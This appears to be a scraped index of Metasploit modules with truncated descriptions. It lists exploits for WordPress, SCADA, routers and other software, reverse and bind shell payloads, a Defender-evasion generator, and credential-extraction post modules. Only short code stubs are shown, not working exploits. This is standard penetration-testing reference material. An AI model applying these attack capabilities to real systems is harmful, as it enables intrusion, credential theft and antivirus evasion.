Microsoft Windows Defender Evasive Executable

This module allows you to generate a Windows EXE that evades against Microsoft Windows Defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metasm, and anti-emulation are used to achieve this. For best results, please try to use payloads that use a more secure...

WordPress Responsive Thumbnail Slider Arbitrary File Upload

This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "WordPre...

Mac OS X APFS Encrypted Volume Password Disclosure

This module exploits a flaw in OSX 10.13 through 10.13.3 that discloses the passwords of encrypted APFS volumes. In OSX a normal user can use the 'log' command to view the system logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS volume the password is visible in plaintext within...

NIS ypserv Map Dumper

This module dumps the specified map from NIS ypserv. The following examples are from ypcat -x: Use "ethers" for map "ethers.byname" Use "aliases" for map "mail.aliases" Use "services" for map "services.byname" Use "protocols" for map "protocols.bynumber" Use "hosts" for map "hosts.byname" Use...

Unix Command Shell, Bind TCP (stub)

Listen for a connection and spawn a command shell stub only, no payload This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 0 include Msf::Payload::Single include...

Linux Command Shell, Reverse TCP Inline

Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 152 include Msf::Payload::Single include Msf::Payload::Linux::Aarch64::Prepends...

Linux Meterpreter, Reverse HTTPS Inline

Run the Meterpreter / Mettle server payload stageless This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generatemettlepayloads.rb module MetasploitModule CachedSize = 1238560 include...

RF Transceiver Transmitter

This module powers an HWBridge-connected radio transceiver, effectively transmitting on the frequency set by the FREQ option. NOTE: Users of this module should be aware of their local laws, regulations, and licensing requirements for transmitting on any given radio frequency. This module requires...

WordPress Ninja Forms Unauthenticated File Upload

Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server. This module requires Metasploit: https://metasploit.com/download Current source:...

Zabbix toggle_ids SQL Injection

This module will exploit a SQL injection in Zabbix 3.0.3 and likely prior in order to save the current usernames and password hashes from the database to a JSON file. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...

Magento 2.0.6 Unserialize Remote Code Execution

This module exploits a PHP object injection vulnerability in Magento 2.0.6 or prior. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Magento 2.0.6 Unserialize Remote Code Execution',...

Chinese Caidao Backdoor Bruteforce

This module attempts to bruteforce chinese caidao asp/php/aspx backdoor. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' require...

Post Windows Gather NTDS.DIT Location

This module will find the location of the NTDS.DIT file from the Registry, check that it exists, and display its location on the screen, which is useful if you wish to manually acquire the file using ntdsutil or vss. This module requires Metasploit: https://metasploit.com/download Current source:...

Write Messages to Users

This module utilizes the wall1 or write1 utilities, as appropriate, to send messages to users on the target system. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Write Messages to Users',...

Send Cisco Discovery Protocol (CDP) Packets

This module sends Cisco Discovery Protocol CDP packets. Note that any responses to the CDP packets broadcast from this module will need to be analyzed with an external packet analysis tool, such as tcpdump or Wireshark in order to learn more about the Cisco switch and router environment. This...

Oracle Event Processing FileUploadServlet Arbitrary File Upload

This module exploits an arbitrary file upload vulnerability in Oracle Event Processing 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be abused to upload a malicious file onto an arbitrary location due to a directory traversal flaw, and compromise the server. B...

Supermicro Onboard IPMI Port 49152 Sensitive File Exposure

This module abuses a file exposure vulnerability accessible through the web interface on port 49152 of Supermicro Onboard IPMI controllers. The vulnerability allows an attacker to obtain detailed device information and download data files containing the clear-text usernames and passwords for the...

Netopia 3347 Cable Modem Wifi Enumeration

This module extracts WEP keys and WPA preshared keys from certain Netopia cable modems. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Netopia 3347 Cable Modem Wifi Enumeration', 'Description'...

JIRA Issues Collector Directory Traversal

This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists in the issues collector code, while handling attachments provided by the user. It can be exploited in Windows environments to get remote code execution. This module has been tested successfully on JIRA 6.0.3...

Katello (Red Hat Satellite) users/update_roles Missing Authorization

This module exploits a missing authorization vulnerability in the "updateroles" action of "users" controller of Katello and Red Hat Satellite Katello 1.5.0-14 and earlier by changing the specified account to an administrator account. This module requires Metasploit: https://metasploit.com/downloa...

Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow

This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability exists in the service BKBCopyD.exe when handling specially crafted packets. This module has been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3. This module requires...

Windows Enumerate LSA Secrets

This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is: HKEYLOCALMACHINE\Security\Policy\Secrets\. Thanks goes to Maurizio Agazzini and Mubix for decrypt code from cachedump. This module requires Metasploit: https://metasploit.com/download...

GE Proficy Cimplicity WebView substitute.bcl Directory Traversal

This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5. This module requires Metasploit:...

Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy

Inject the Meterpreter server DLL via the Reflective Dll Injection payload staged. Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support This module requires Metasploit: https://metasploit.com/download Current source:...

Java Applet ProviderSkeleton Insecure Invoke Method

This module abuses the insecure invoke method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. This module requires Metasploit: https://metasploit.com/download Current source:...

Unix Command Shell, Bind TCP (via Zsh)

Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module...

Canon Wireless Printer Denial Of Service

The HTTP management interface on several models of Canon Wireless printers allows for a Denial of Service DoS condition via a crafted HTTP request. Note: if this module is successful, the device can only be recovered with a physical power cycle. This module requires Metasploit:...

D-Link DIR 645 Password Extractor

This module exploits an authentication bypass vulnerability in DIR 645 'D-Link DIR 645 Password Extractor', 'Description' = %q This module exploits an authentication bypass vulnerability in DIR 645 'OSVDB', '90733' , 'BID', '58231' , 'PACKETSTORM', '120591' , 'Author' = 'Roberto Paleari ',...

Windows Gather TortoiseSVN Saved Password Extraction

This module extracts and decrypts saved TortoiseSVN passwords. In order for decryption to be successful this module must be executed under the same privileges as the user which originally encrypted the password. This module requires Metasploit: https://metasploit.com/download Current source:...

Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16

This module exploits a buffer overflow in Sielco Sistem Winlog 'Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16', 'Description' = %q This module exploits a buffer overflow in Sielco Sistem Winlog MSFLICENSE, 'Author' = 'Michael Messner ' , 'References' = 'BID', '53811', 'CVE', '2012-3815'...

RuggedCom Telnet Password Generator

This module will calculate the password for the hard-coded hidden username "factory" in the RuggedCom Rugged Operating System ROS. The password is dynamically generated based on the devices MAC address. This module requires Metasploit: https://metasploit.com/download Current source:...

HP Data Protector 6.1 EXEC_CMD Command Execution

This module exploits HP Data Protector's omniinet process, specifically against a Windows setup. When an EXECCMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW. If the file is found, the process will then go ahead execute it with...

Windows Gather SmartFTP Saved Password Extraction

This module finds saved login credentials for the SmartFTP FTP client for windows. It finds the saved passwords and decrypts them. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rexml/document' class...

2Wire Cross-Site Request Forgery Password Reset Vulnerability

This module will reset the admin password on a 2Wire wireless router. This is done by using the /xslt page where authentication is not required, thus allowing configuration changes such as resetting the password as administrators. This module requires Metasploit: https://metasploit.com/download...

Custom Payload

Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 0 include Msf::Payload::Single include...

Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)

This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...

Sielco Sistemi Winlog Buffer Overflow

This module exploits a buffer overflow in Sielco Sistem Winlog 'Sielco Sistemi Winlog Buffer Overflow', 'Description' = %q This module exploits a buffer overflow in Sielco Sistem Winlog 'Luigi Auriemma', 'MC' , 'License' = MSFLICENSE, 'References' = 'CVE', '2011-0517' , 'OSVDB', '70418', 'URL',...

DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow

This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 Build 6.1.8.10. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...

Apple Airport Extreme Password Extraction (WDBRPC)

This module can be used to read the stored password of a vulnerable Apple Airport Extreme access point. Only a small number of firmware versions have the WDBRPC service running, however the factory configuration was vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are...

Windows Executable Download and Execute (via .vbs)

Download an EXE from an HTTPS URL and execute it This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Sessions::CommandShellOptions de...

Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

This module exploits a buffer overflow vulnerability in the LoadAniIcon function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a...

TWiki Search Function Arbitrary Command Execution

This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands. This module requires Metasploit: https://metasploit.com/download Current source:...

Computer Associates License Server GETCONFIG Overflow

This module exploits an vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...

HTTP SSL Certificate Information

Parse the server SSL certificate to obtain the common name and signature algorithm...

BASE base_qry_common Remote File Include

This module exploits a remote file inclusion vulnerability in the baseqrycommon.php file in BASE 1.2.4 and earlier. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'BASE baseqrycommon Remote Fil...

Microsoft SQL Server Command Execution

This module will execute a Windows command on a MSSQL/MSDE instance via the xpcmdshell default or the spoacreate procedure more opsec safe, no output, no temporary data table. A valid username and password is required to use this module. This module requires Metasploit:...

Realtek Media Player Playlist Buffer Overflow

This module exploits a stack buffer overflow in Realtek Media PlayerRtlRack A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...

Windows Command Shell, Bind TCP (via Ruby)

Continually listen for a connection and spawn a command shell via Ruby This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 128 include Msf::Payload::Single include...

EMC AlphaStor Library Manager Arbitrary Command Execution

EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...

DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow

This module exploits a stack buffer overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs. This module requires Metasploit: https://metasploit.com/download Current source:...